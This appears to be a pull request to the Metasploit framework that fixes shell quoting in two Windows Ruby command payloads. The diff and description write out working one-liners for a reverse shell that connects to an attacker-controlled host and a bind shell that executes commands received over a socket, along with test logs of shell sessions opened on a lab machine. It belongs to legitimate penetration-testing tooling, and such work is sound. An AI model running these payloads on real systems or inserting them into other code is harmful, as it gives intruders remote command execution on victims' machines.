### PR TITLE
fix cmd windows ruby payloads

### DIFF
--- a/modules/payloads/singles/cmd/windows/bind_ruby.rb
+++ b/modules/payloads/singles/cmd/windows/bind_ruby.rb
@@ -40,6 +40,6 @@ module Metasploit3
 	end
 
 	def command_string
-		"ruby -rsocket -e 's=TCPServer.new(\"#{datastore['LPORT']}\");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end;end'"
+		"ruby -rsocket -e \"s=TCPServer.new(\\\"#{datastore['LPORT']}\\\");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,\\\"r\\\"){|io|c.print io.read}end;end\""
 	end
 end

--- a/modules/payloads/singles/cmd/windows/reverse_ruby.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_ruby.rb
@@ -40,6 +40,6 @@ module Metasploit3
 	end
 
 	def command_string
-		"ruby -rsocket -e 'c=TCPSocket.new(\"#{datastore['LHOST']}\",\"#{datastore['LPORT']}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
+		"ruby -rsocket -e \"c=TCPSocket.new(\\\"#{datastore['LHOST']}\\\",\\\"#{datastore['LPORT']}\\\");while(cmd=c.gets);IO.popen(cmd,\\\"r\\\"){|io|c.print io.read}end\""
 	end
 end


### PR DESCRIPTION
Related to:

http://dev.metasploit.com/redmine/issues/7600

Thanks mihi!!!

Testing:

<pre>
msf > use exploit/multi/handler 
msf  exploit(handler) > set payload cmd/windows/reverse_ruby 
payload => cmd/windows/reverse_ruby
msf  exploit(handler) > set LHOST 192.168.1.128
LHOST => 192.168.1.128
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.132:2024) at 2012-12-20 00:55:25 +0100

net user

User accounts for \\JUAN-C0DE875735

-------------------------------------------------------------------------------
Administrator            ASPNET                   Guest                    
HelpAssistant            SUPPORT_388945a0         
The command completed successfully.

^C
Abort session 1? [y/N]  y

[*] 192.168.1.132 - Command shell session 1 closed.  Reason: User exit
msf  exploit(handler) > set payload cmd/windows/bind_ruby 
payload => cmd/windows/bind_ruby
msf  exploit(handler) > set RHOST 192.168.1.132
RHOST => 192.168.1.132
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started bind handler
[*] Starting the payload handler...
[*] Command shell session 2 opened (192.168.1.128:58724 -> 192.168.1.132:4444) at 2012-12-20 00:57:00 +0100

net user

User accounts for \\JUAN-C0DE875735

-------------------------------------------------------------------------------
Administrator            ASPNET                   Guest                    
HelpAssistant            SUPPORT_388945a0         
The command completed successfully.

^C
Abort session 2? [y/N]  y

[*] 192.168.1.132 - Command shell session 2 closed.  Reason: User exit

</pre>


target cmd commands:

<pre>
ruby -rsocket -e "c=TCPSocket.new(\"192.168.1.128\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end"
ruby -rsocket -e "s=TCPServer.new(\"4444\");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end;end"
</pre>
